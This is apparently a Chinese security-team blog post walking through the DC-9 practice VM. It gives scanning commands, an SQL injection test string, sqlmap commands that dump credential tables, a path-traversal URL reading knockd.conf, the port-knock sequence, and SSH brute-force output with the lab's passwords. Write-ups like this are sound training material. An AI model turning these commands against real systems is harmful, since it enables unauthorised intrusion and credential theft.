免责声明: 文章仅用于技术分享,切勿非法测试,由于传播、利用本公众号朱厌安全团队所提供的信息而造成的后果以及损失,均由使用者本人承担,本公众号朱厌安全团队以及作者不为此承担任何责任!如有侵权烦请告知,我们会立即删除并致歉!
扫描存活主机
netdiscover -i eth0 -r 10.20.30.0
扫描开放的端口有哪些
masscan 10.20.30.130 -p0-65535 –rate=1000
使用 nmap 对端口进行一个扫描
nmap 10.20.30.130 -p80 -T4 -A –script=auth
nmap 10.20.30.130 -p80 -T4 -A –script=vuln
访问主机 ip 地址
在输入库输入 1′ or 1=1 –qwe 会发现爆出来了很多内容
有可能存在 sql 注入,打开 sqlmap 跑起来
发现不行,打开 bp 抓包看看呢
这里需要把 bp 中的 request 请求包复制出来,保存成一个 txt 文件。使用 sqlmap 的 -r 参数 调用该文本
然后爆库爆表一系列操作
sqlmap -r dc9 –dbs
sqlmap -r dc9 -D users –tables
sqlmap -r dc9 -D users -T UserDetails –columns
sqlmap -r dc9 -D users -T UserDetails -C password,id,username –dump
然后爆 staff 的
sqlmap -r dc9 -D Staff –tables
sqlmap -r dc9 -D Staff -T Users –columns
sqlmap -r dc9 -D Staff -T Users -C Password,UserID,Username –dump
这里 sqlmap 自带的解密就把密码解开了哈
登录一下
发现 file does not exist,有可能存在任意文件读取漏洞
然后就卡壳了,百度了一下,这个靶机使用了Knockd进行防护
1.这个 knockd.conf 是一种端口试探服务器工具,它侦听以太网或其他可用接口上的所有流量,等待特殊序列的端口命中 (port-hit)。telnet 或 Putty 等客户软件通过向服务器上的端口发送 TCP 或数据包来启动端口命中,也可以直接用 nc 敲击端口。
简单来说就是用来隐藏 ssh 登陆端口。(也就是我们之前扫描端口时发现 22 端口阻塞)只有我们按照设定的顺序敲击端口,防火墙才会打开登陆端口。再按照同样的方式可以使防火墙关闭 ssh 登陆端口,如果别人不知道我们设定的端口敲击顺序,是无法登陆 ssh 的。我们可以下载 knock 来开启远程端口,访问 http://10.20.30.130/welcome.php?file=../../../../../../../etc/knockd.conf 文件
发现我们需要去敲门,7469,8475,9842 这几个端口,开始 ssh 服务
然后 ssh 爆破
上续在 sql 的时候跑出来了一堆用户名密码,用来写为字典然后爆破
爆了半天才发现,没有把 L 写成 l
[22][ssh] host: 10.20.30.130 login: chandlerb password: UrAG0D![22][ssh] host: 10.20.30.130 login: joeyt password: Passw0rd[22][ssh] host: 10.20.30.130 login: janitor password: Ilovepeepee
然后连接上账号看看里面有些什么东西
在连接 janitor 的时候发现了其他的一些密码,加入密码本开始爆破
开始二次爆破
使用 fredf 登录
发现了敏感信息,并且 opt 目录下的 test.py 有可能是我们的目标文件
查看文件
最后切换为 joety 提权
原文始发于微信公众号(朱厌安全团队):记一次DC-9打靶
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论